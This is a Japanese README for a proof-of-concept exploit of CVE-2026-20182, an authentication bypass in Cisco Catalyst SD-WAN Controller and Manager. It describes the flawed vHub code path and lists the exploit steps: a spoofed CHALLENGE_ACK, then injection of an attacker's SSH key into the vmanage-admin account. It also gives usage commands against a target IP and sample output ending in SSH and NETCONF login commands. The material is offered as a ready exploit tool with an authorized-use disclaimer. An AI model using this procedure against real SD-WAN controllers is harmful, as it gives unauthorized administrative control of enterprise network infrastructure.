CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager 認証バイパス
Cisco Catalyst SD-WAN Controller (vSmart) および Manager (vManage) 上の vdaemon DTLS サービス (UDP/12346) における重大な (CVSS 10.0) 認証バイパスである CVE-2026-20182 の概念実証エクスプロイトです。
公開: 2026年5月14日、Rapid7 (Stephen Fewer & Jonah Burgess) により公開
CISA KEV: 2026年5月14日に追加 (緊急指令26-03)
CVSS: 10.0 — CWE-287: 不適切な認証
脆弱性
vdaemon サービスは、コントロールプレーンのピアを認証するために複数フェーズからなる DTLS ハンドシェイクを使用します。vbond_proc_challenge_ack() 関数はデバイスタイプ固有の証明書検証を実装していますが、デバイスタイプ 2 (vHub) には 検証コードパスがありません。device_type=2 を指定して CHALLENGE_ACK を送信すると、この関数はすべての条件分岐をフォールスルーし、無条件に peer->authenticated = 1 を設定します。
有効な認証情報も、CA 署名付き証明書も、SD-WAN 導入に関する知識も必要ありません。
エクスプロイトの動作
- ターゲットの vdaemon サービス (UDP/12346) への DTLS 1.2 接続を確立します
- CHALLENGE メッセージ (msg_type=8) を受信します
- vHub (device_type=2) であると主張する CHALLENGE_ACK を送信します → ピアは認証済みとマークされます
- HELLO (msg_type=5) を送信します → ピアは UP 状態に遷移します
MSG_VMANAGE_TO_PEER (msg_type=14) を介して SSH 公開鍵を /home/vmanage-admin/.ssh/authorized_keys に注入します
vmanage-admin として NETCONF アクセス (SSH TCP/830) または SSH アクセス (TCP/22) を許可します
使用方法
python3 cve-2026-20182.py -t <target> [options]
オプション
使用例
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100
# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
出力
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
影響を受けるバージョン
研究リファレンス
技術詳細
vdaemon プロトコルヘッダーは 12 バイトです:
デバイスタイプ: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage
要件
- Python 3.7+
openssl CLI (DTLS トランスポート用)
cryptography ライブラリ (pip install cryptography)
免責事項
このエクスプロイトは、明示的な書面による許可を得たシステムに対する、認定されたレッドチーム運用、ペネトレーションテスト、およびセキュリティ研究のみを目的としています。許可のない使用は違法です。